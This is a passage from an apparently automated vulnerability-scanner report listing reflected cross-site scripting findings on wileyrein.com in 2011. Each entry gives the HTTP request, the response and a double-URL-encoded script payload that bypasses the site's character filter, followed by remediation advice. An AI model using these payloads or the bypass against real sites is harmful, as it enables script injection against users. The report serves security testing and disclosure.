Host:   http://www.wileyrein.com
Path:   /js/ui.datepicker.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea was submitted in the REST URL parameter 2. This input was echoed as 29ad5"><script>alert(1)</script>e294e4483ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.datepicker.js29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.datepicker.js29ad5"><script>alert(1)</script>e294e4483ea" value="">
...[SNIP]...

4.202. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.dialog.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd was submitted in the REST URL parameter 1. This input was echoed as fe969"><script>alert(1)</script>c77ca9823dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsfe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd/ui.dialog.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsfe969"><script>alert(1)</script>c77ca9823dd/ui.dialog.js" value="">
...[SNIP]...

4.203. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.dialog.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de was submitted in the REST URL parameter 2. This input was echoed as 4ae75"><script>alert(1)</script>6ccc3364de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.dialog.js4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.dialog.js4ae75"><script>alert(1)</script>6ccc3364de" value="">
...[SNIP]...

4.204. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.draggable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed was submitted in the REST URL parameter 1. This input was echoed as 41fbd"><script>alert(1)</script>3ba108ca8ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed/ui.draggable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js41fbd"><script>alert(1)</script>3ba108ca8ed/ui.draggable.js" value="">
...[SNIP]...

4.205. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.draggable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 was submitted in the REST URL parameter 2. This input was echoed as ee808"><script>alert(1)</script>982f7a16b81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.draggable.jsee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.draggable.jsee808"><script>alert(1)</script>982f7a16b81" value="">
...[SNIP]...

4.206. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.resizable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e was submitted in the REST URL parameter 1. This input was echoed as 159bb"><script>alert(1)</script>ff8afb5f36e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e/ui.resizable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js159bb"><script>alert(1)</script>ff8afb5f36e/ui.resizable.js" value="">
...[SNIP]...

4.207. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.resizable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 was submitted in the REST URL parameter 2. This input was echoed as 6dd6d"><script>alert(1)</script>a322173fb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.resizable.js6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.resizable.js6dd6d"><script>alert(1)</script>a322173fb55" value="">
...[SNIP]...

4.208. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f was submitted in the REST URL parameter 1. This input was echoed as 4823f"><script>alert(1)</script>74755294a4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f/awards/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss4823f"><script>alert(1)</script>74755294a4f/awards/rss.xml" value="">
...[SNIP]...

4.209. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe was submitted in the REST URL parameter 2. This input was echoed as 3ddba"><script>alert(1)</script>b482c6d5ffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/awards3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/awards3ddba"><script>alert(1)</script>b482c6d5ffe/rss.xml" value="">
...[SNIP]...

4.210. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 was submitted in the REST URL parameter 3. This input was echoed as 4862c"><script>alert(1)</script>626bbbadd84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/awards/rss.xml4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/awards/rss.xml4862c"><script>alert(1)</script>626bbbadd84" value="">
...[SNIP]...

4.211. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56 was submitted in the REST URL parameter 1. This input was echoed as 96c9a"><script>alert(1)</script>b17c06f0b56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56/events/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss96c9a"><script>alert(1)</script>b17c06f0b56/events/rss.xml" value="">
...[SNIP]...

4.212. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192 was submitted in the REST URL parameter 2. This input was echoed as 8d1d6"><script>alert(1)</script>3f934a0d192 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/events8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/events8d1d6"><script>alert(1)</script>3f934a0d192/rss.xml" value="">
...[SNIP]...

4.213. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a was submitted in the REST URL parameter 3. This input was echoed as 5ac25"><script>alert(1)</script>a7c854d93a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/events/rss.xml5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/events/rss.xml5ac25"><script>alert(1)</script>a7c854d93a" value="">
...[SNIP]...

4.214. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c was submitted in the REST URL parameter 1. This input was echoed as cefc3"><script>alert(1)</script>b60ad84eb9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rsscefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c/in_the_news/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rsscefc3"><script>alert(1)</script>b60ad84eb9c/in_the_news/rss.xml" value="">
...[SNIP]...

4.215. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4 was submitted in the REST URL parameter 2. This input was echoed as cc00e"><script>alert(1)</script>d760b3b5dd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/in_the_newscc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


